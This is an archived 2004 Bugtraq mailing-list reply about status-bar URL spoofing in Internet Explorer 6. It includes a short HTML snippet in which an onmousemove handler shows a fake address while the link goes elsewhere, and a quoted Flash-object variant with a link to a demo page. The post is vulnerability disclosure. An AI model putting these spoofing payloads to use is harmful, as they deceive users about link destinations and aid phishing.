Re: New URL spoofing bug in Microsoft Internet Explorer

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: New URL spoofing bug in Microsoft Internet Explorer
From: q q <systemcracker@xxxxxxxxx>
Date: Tue, 16 Nov 2004 16:11:05 +0000
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=tD+ZeTNu6v7gIpQ2hPzePDqQw+0msgdo6UVBkoc7QbmZDQo73DTjn25qKJSRqsBLRtfQwmcw0SClbms+4jz6290hnlw9qdraYAnp+8gvMYXE8GyIZMf3eFUQKWhDn8k27VXZ11b8qEnKOrpjVUzjM421dzPD128lgZzqzm8n0oI=
In-reply-to: <20041108233055.25153.qmail@xxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20041108233055.25153.qmail@xxxxxxxxxxxxxxxxxxxxx>
Reply-to: q q <systemcracker@xxxxxxxxx>

I thought this was obvious, but having seen the amount of discussion,
here's another URL spoofer:

<a href="http://www.google.com";
onmousemove="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>

note that 

<a href="http://www.google.com";
onmouseover="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>

won't work - it seems MS have already half fixed this....

(tested on MSIE 6.0, winXP)


On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi
<roozbeh_afrasiabi@xxxxxxxxx> wrote:
> In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer>
> 
> Here is another way of spoofing the status bar:
> 
> <a> tag + <object> tag
> 
> <!--A HREF=http://www.yahoo.com><!--OBJECT 
> classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
> 
> codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0";
> 
> WIDTH="300" HEIGHT="50" id="link" ALIGN="">
> 
> <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM 
> NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu
> 
> VALU=FALSE>
> 
>  <EMBED src="link.swf" quality=high bgcolor=#FFFFFF  WIDTH="300" HEIGHT="50" 
> NAME="link" ALIGN=""
> 
> TYPE="application/x-shockwave-flash" 
> PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer";></EMBED>
> 
> </a></OBJECT></a>
> 
> *this method of spoofing the status bar allows malicious users to hide the 
> target url from suspecting ppl ,demo page uses flash to generate
> 
> random urls.
> 
> demo:
> 
> http://www.persiax.com/pocs/statusbar/status.htm
> 
> 


-- 
PHP, mySQL Security and more at http://www.puremango.co.uk

Follow-Ups:
- Re: New URL spoofing bug in Microsoft Internet Explorer
  - From: GuidoZ

References:
- Re: New URL spoofing bug in Microsoft Internet Explorer
  - From: roozbeh afrasiabi

Prev by Date: TSLSA-2004-0058 - multi
Next by Date: [ GLSA 200411-24 ] BNC: Buffer overflow vulnerability
Previous by thread: Re: New URL spoofing bug in Microsoft Internet Explorer
Next by thread: Re: New URL spoofing bug in Microsoft Internet Explorer
Index(es):
- Date
- Thread